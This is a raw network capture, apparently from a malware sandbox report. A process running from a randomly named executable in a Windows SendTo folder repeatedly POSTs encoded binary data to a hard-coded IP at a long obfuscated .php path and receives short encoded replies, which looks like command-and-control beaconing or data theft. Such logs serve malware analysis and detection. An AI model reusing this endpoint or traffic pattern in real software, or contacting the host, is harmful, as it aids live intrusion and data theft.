                                          Sep 13, 2024 21:03:17.972848892 CEST2108OUTData Raw: 5b 56 46 51 50 46 5c 55 59 5f 51 51 52 5b 54 55 5a 59 5a 5a 55 57 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFQPF\UY_QQR[TUZYZZUWSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A+%41:#3:=)?,5Z=7?[$U(V%\?B1? %9[&!^-+
                                          Sep 13, 2024 21:03:19.314418077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:19.314533949 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 57 25 2b 3b 55 2c 2d 32 14 33 2f 28 1e 29 20 35 44 29 2d 16 5b 2c 3a 21 06 30 5d 35 5a 33 05 2f 5a 33 3c 30 09 3d 3a 2e 46 0d 1d 25 1a 3f 2c 30 1f 3e 07 3c 5d 27 10 21 59 20 56 3b 19 33 3c 3b 1c 20 5a 26 59 20 21 38 0b 25 5c 39 5d 2f 43 29 07 2a 1f 03 00 37 0c 2e 55 0f 15 3a 0a 24 31 39 0e 3c 0c 01 5b 29 11 2e 1d 26 06 37 56 32 2b 06 57 33 38 26 53 25 11 2d 1f 27 31 33 5b 2b 2d 29 53 22 31 08 57 36 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<6;W%+;U,-23/() 5D)-[,:!0]5Z3/Z3<0=:.F%?,0><]'!Y V;3<; Z&Y !8%\9]/C)*7.U:$19<[).&7V2+W38&S%-'13[+-)S"1W6'T#(V3YT0
                                          Sep 13, 2024 21:03:19.314564943 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 57 25 2b 3b 55 2c 2d 32 14 33 2f 28 1e 29 20 35 44 29 2d 16 5b 2c 3a 21 06 30 5d 35 5a 33 05 2f 5a 33 3c 30 09 3d 3a 2e 46 0d 1d 25 1a 3f 2c 30 1f 3e 07 3c 5d 27 10 21 59 20 56 3b 19 33 3c 3b 1c 20 5a 26 59 20 21 38 0b 25 5c 39 5d 2f 43 29 07 2a 1f 03 00 37 0c 2e 55 0f 15 3a 0a 24 31 39 0e 3c 0c 01 5b 29 11 2e 1d 26 06 37 56 32 2b 06 57 33 38 26 53 25 11 2d 1f 27 31 33 5b 2b 2d 29 53 22 31 08 57 36 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<6;W%+;U,-23/() 5D)-[,:!0]5Z3/Z3<0=:.F%?,0><]'!Y V;3<; Z&Y !8%\9]/C)*7.U:$19<[).&7V2+W38&S%-'13[+-)S"1W6'T#(V3YT0
                                          Sep 13, 2024 21:03:19.314933062 CEST | 374 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:19.558084011 CEST | 374 | IN | HTTP/1.1 100 Continue


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          50 | 192.168.2.4 | 56719 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:17.854718924 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:18.207760096 CEST2528OUTData Raw: 5e 55 43 53 55 43 59 56 59 5f 51 51 52 59 54 52 5a 58 5a 50 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCSUCYVY_QQRYTRZXZPUWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*?6[72)_ !]=:(?*+$??:3 V2'A&/01;9[&!^-'
                                          Sep 13, 2024 21:03:19.314503908 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:19.314744949 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:19.314771891 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:19.315210104 CEST | 225 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:19.558542013 CEST225INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          51          192.168.2.4  56720        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:19.856996059 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:20.209326029 CEST  2528  OUT
                                          Sep 13, 2024 21:03:20.894411087 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:20.895653009 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:20.895832062 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          52          192.168.2.4  56721        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:21.031596899 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:21.379127979 CEST  2532  OUT
                                          Sep 13, 2024 21:03:21.798057079 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:21.929012060 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          53          192.168.2.4  56722        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:22.057118893 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:22.410348892 CEST  2532  OUT
                                          Sep 13, 2024 21:03:22.966165066 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:22.966217995 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:22.966382027 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          54          192.168.2.4  56723        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:23.130951881 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:23.488631010 CEST  2528  OUT
                                          Sep 13, 2024 21:03:24.163547039 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:24.163832903 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:24.163933039 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          55          192.168.2.4  56724        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:24.288075924 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:24.644937992 CEST  2532  OUT
                                          Sep 13, 2024 21:03:24.769686937 CEST  1236  OUT
                                          Sep 13, 2024 21:03:25.030189991 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:25.478893995 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:25.478949070 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:25.479449034 CEST  225  IN  HTTP/1.1 100 Continue


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          56          192.168.2.4  56725        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:24.324970961 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:24.675961971 CEST  2084  OUT
                                          Sep 13, 2024 21:03:25.057286978 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:25.478981018 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Sep 13, 2024 21:03:25.479090929 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Sep 13, 2024 21:03:25.479645014 CEST  374  IN  HTTP/1.1 100 Continue


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          57          192.168.2.4  56726        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:25.925213099 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:26.269898891 CEST  2532  OUT
                                          Sep 13, 2024 21:03:26.667366982 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:26.823060036 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          58          192.168.2.4  56727        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:26.986407995 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:27.332396984 CEST  2532  OUT
                                          Sep 13, 2024 21:03:27.741988897 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:27.868176937 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          59          192.168.2.4  56728        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:28.732692957 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:29.083277941 CEST  2532  OUT
                                          Sep 13, 2024 21:03:29.468070984 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:29.598134041 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:29 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          60 | 192.168.2.4 | 56729 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:29.751075983 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:30.098078012 CEST | 2532 | OUT | Data Raw: 5b 55 46 56 55 41 59 54 59 5f 51 51 52 5c 54 52 5a 5e 5a 5d 55 54 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UFVUAYTY_QQR\TRZ^Z]UTSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+Y2 "6#U9[>;2=?Y*(0?<'34W%*@&<<';9[&!^-7
                                          Sep 13, 2024 21:03:30.500865936 CEST | 25 | IN | HTTP/1.1 100 Continue


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          61 | 192.168.2.4 | 56730 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:30.510407925 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:30.863826990 CEST | 2084 | OUT | Data Raw: 5b 52 43 5e 55 40 5c 57 59 5f 51 51 52 5b 54 5b 5a 5f 5a 59 55 5f 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RC^U@\WY_QQR[T[Z_ZYU_SIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:??#T!\70"=(%(?^*8?)3Q%:7@11;9[&!^-+
                                          Sep 13, 2024 21:03:31.254195929 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:31.385715008 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
